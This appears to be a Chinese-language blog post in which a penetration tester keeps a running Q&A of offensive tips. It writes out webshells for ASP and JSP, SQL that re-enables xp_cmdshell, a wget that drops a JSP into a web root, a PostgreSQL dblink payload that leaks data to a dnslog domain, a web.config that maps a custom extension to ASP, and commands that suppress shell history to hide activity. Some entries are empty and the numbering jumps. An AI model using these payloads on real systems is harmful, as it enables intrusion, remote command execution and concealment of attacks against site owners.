0x00 关于

这篇大概会显得有些杂乱无章,但主要是用记录自己在平日遇到的问题及寻到的答案
之所以会采用这样的方式,是因为师傅跟我说,他身边个有这样的大佬,积累的小技巧最终都可以出书了...
它会记录成长,哪怕是零碎的 不成体系的知识点

总之。好的习惯,就需要坚持 所以今后会持续更新
如若有一天 此Q&A到达很大的数量时,会对顺序和类型再做一些整理吧

0x01 正文Q&A

1.恢复xp_cmdshell存储过程的SQL语句

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

2.当遇到恢复时遇到"sp_configure错误:不支持对系统目录进行即席更新"

EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE WITH OVERRIDE;

3.MSSQL差异备份的SQL语句

4.Linux VPS上快速开启HTTP服务

python -m SimpleHTTPServer 80

5.Oracle注入,dba权限的利用方式


可以利用sqlmap --passwords参数,获得数据库用户的账号密码,并利用oracleshell工具连接并执行系统命令(前提,windows服务器且外开1521端口)

连接数据库时,需要服务名或SID。在--sql-shell下:
select global_name from global_name;(服务名)
select instance_name from v$instance;  (实例名/sid)

6.上传asp的Webshell时,若无法写入"及%符号,可以用以下马

<script language=vbs runat=server>eval request(0)</script>

7.Linux下将远程文件下载到指定目录

wget -P /var/html/www http://123.123.123.123/1.jsp

8.Linux下快速定位Web所在目录

1.查看前端源码,找到特殊的CSS或JS文件,如xxx.css
2.

9.双击无法打开时,命令行下允许Jar文件

java -jar xxx.jar

10.Linux下支持运行MSSQL2017,该版本的MSSQL无法直接调用xp_cmdshell(因为目前不支持该组件)。但可以通过xp_dirtree()组件来进行列目录。并且渗透时,可对内容文件进行读取操作,利用获取的信息进一步攻击。经测试,该Linux版本无法利用xp_dirtree进行DNSlog获取信息。所以盲注时,需要进一步研究。

11.遇到存在WAF的.net站点时,可以通过unicode编码,对sql注入的payload进行编码,绕过WAF防护。

12.Sqlmap下支持使用-d参数,通过命令行远程连接开放端口的数据库,进行操作。
命令如下:

sqlmap.py -d ""

13.判断是否是ThinkPHP框架的 一条指纹:


http://url/?c=4e5e5d7364f443e28fbf0d3ae744a59a或http://url/4e5e5d7364f443e28fbf0d3ae744a59a

若出现TP框架的LOGO则有该框架。

14.Sqlmap中利用注入,快速定位可能的管理员用户表:


利用参数-search,可以精准/模糊查询 字段名,方便查找
例:sqlmap.py -r 1.txt -D cms -search -C admin,pass

25.Thinkphp日志格式


/application/runtime/logs/年+月+日.log 如 (19_03_06.log)
/runtime/logs/Home/年+月+日.log
/runtime/logs/Home/年+月+日.log

26.注入利用DNSlog的前提:

利用DNS从有漏洞的数据库中渗出数据的前提条件是DBMS中有可用的能直接或间接引发DNS解析过程的子程序,然后这类的子程序被攻击者控制和调用。

27.Sqlmap指定特定类型进行注入检测:


通过参数 --technique=
B: Boolean-based blind SQL injection(布尔型注入)
E: Error-based SQL injection(报错型注入)
U: UNION query SQL injection(可联合查询注入)
S: Stacked queries SQL injection(可多语句查询注入)
T: Time-based blind SQL injection(基于时间延迟注入)

如要检测堆叠查询: --technique=S

28.Windows下 ,快速查找指定文件位置的命令
如在c盘下 查找mimikatz:

dir find c:\mimikatz.exe /s

29.msf获取shell后 为什么通常要进行进程迁移的操作:

刚获取的Meterpreter shell非常脆弱易受攻击,例如攻击者可以利用浏览器漏洞攻陷目标机器,攻击渗透后浏览器有可能被用户关闭。所以第一步就是要移动进程,将它和目标机中一个稳定的进程绑在一起,而不需要对磁盘进行任何写入操作。(渗透更难被检测)

30.Linux系统存在文件下载时,如何获取目录结构信息

下载/var/lib/mlocate/mlocate.db ,这个数据库中含有本地所有文件信息。Linux系统自动创建这个数据库,并且每天自动更新一次。

此漏洞利用方式结合不完全的上传漏洞(仅返回shell名称,不返回路径),效果更佳

31.PostgreSQL注入时,如何发起DNS请求

CREATE EXTENSION dblink;SELECT * FROM dblink('host='||(select user)||'.twfppo.dnslog.cn user=someuser dbname=somedb', 'SELECT version()') RETURNS (result TEXT);--

32.IIS下,让指定的文件后缀解析为asp文件

 <?xml version="1.0" encoding="utf-8"?>
    <configuration>
        <system.webServer>
            <directoryBrowse enabled="true" />
            <handlers>
                <add name="asdx" path="*.asdx" verb="GET,HEAD,POST,DEBUG" 
                modules="IsapiModule"                        
                scriptProcessor="%windir%\System32\inetsrv\asp.dll"
                resourceType="Unspecified" 
                requireAccess="Script" />
            </handlers>
        </system.webServer>
    </configuration>

保存为web.config,至指定目录

33.cmd下 利用powershell对指定ip进行端口扫描

powershell -c "444..446 | % {echo ((new-object Net.Sockets.TcpClient).Connect(\"192.168.180.16\",$_)) \"Port $_ is open!\"} 2>$null"

34.不包含双引号的JSP一句话

<%
       Runtime.getRuntime().exec(request.getParameter(Character.toString('x')));
%>

35.获取windows下 安装的软件列表

wmic product list brief

36.获取Windows下 盘符命令

#本地硬盘
wmic logicaldisk where DriveType=3 get DeviceID
#网络位置
wmic logicaldisk where DriveType=4 get DeviceID

37.Linux下不记录操作痕迹(只在当前终端会话内有效)

export HISTFILE=/dev/null export HISTSIZE=0

标签: none

添加新评论